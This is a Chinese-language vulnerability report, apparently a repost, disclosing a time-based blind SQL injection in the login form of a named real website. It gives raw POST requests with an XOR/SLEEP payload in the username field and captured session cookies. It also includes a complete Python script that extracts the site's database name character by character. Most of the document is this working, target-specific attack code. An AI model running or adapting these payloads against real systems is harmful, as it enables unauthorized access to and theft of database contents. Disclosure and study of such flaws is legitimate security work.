【延迟注入】A5站长网某站存在SQL注入漏洞
A5站长网某站存在SQL注入漏洞(附验证脚本)
详细说明:
code 区域
POST /Login/login HTTP/1.1
Host: lianmeng.admin5.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221c320e29cca506504514677a0d5fd96d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22210.74.157.98%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A65%3A%22Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A40.0%29+Gecko%2F20100101+Firefox%2F40.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1445589426%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Db420bfdef11a47e249791b34c8cf9b670d135b57; CNZZDATA1253702959=369810679-1445589126-%7C1445589126
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 106
change=&password=g00dPa%24%24w0rD&username='XOR(if(now()=sysdate(),SLEEP(IF(length(database())=11,5,0)),0))OR'延迟注入 为真时,延迟5秒,db长度为11:
为假时,不延迟:
db的第一位为l(ascii:108)
code 区域
POST /Login/login HTTP/1.1
Host: lianmeng.admin5.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221c320e29cca506504514677a0d5fd96d%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A13%3A%22210.74.157.98%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A65%3A%22Mozilla%2F5.0+%28Windows+NT+5.1%3B+rv%3A40.0%29+Gecko%2F20100101+Firefox%2F40.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1445589426%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7Db420bfdef11a47e249791b34c8cf9b670d135b57; CNZZDATA1253702959=369810679-1445589126-%7C1445589126
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 114
change=&password=g00dPa%24%24w0rD&username='XOR(if(now()=sysdate(),SLEEP(IF(ascii(mid(database(),1,1))=108,5,0)),0))OR'
code 区域
#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib
import math
headers = {'Content-Type':'application/x-www-form-urlencoded'}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
print 'Start to retrive MySQL DB:'
db= ''
for i in range(1, 12):
for payload in payloads:
#time.sleep(5) #5秒来一发
s = "change=&password=g00dParD&username='XOR(if(now()=sysdate(),SLEEP(IF(ascii(mid(database(),%s,1))=%s,3,0)),0))OR'" % (i, ord(payload))
conn = httplib.HTTPConnection('lianmeng.admin5.com', timeout=150)
conn.request(method='POST',
url='/Login/login',
body=s,
headers=headers)
start_time = time.time()
conn.getresponse()
conn.close()
print '.',
if time.time() - start_time > 3.0:
db += payload
print '\n\n[in progress]', db,
break
print '\n\n[Done] MySQL DB is %s' % db本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2015-10-29,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录
相关产品与服务
云数据库 MySQL
腾讯云数据库 MySQL(TencentDB for MySQL)为用户提供安全可靠,性能卓越、易于维护的企业级云数据库服务。其具备6大企业级特性,包括企业级定制内核、企业级高可用、企业级高可靠、企业级安全、企业级扩展以及企业级智能运维。通过使用腾讯云数据库 MySQL,可实现分钟级别的数据库部署、弹性扩展以及全自动化的运维管理,不仅经济实惠,而且稳定可靠,易于运维。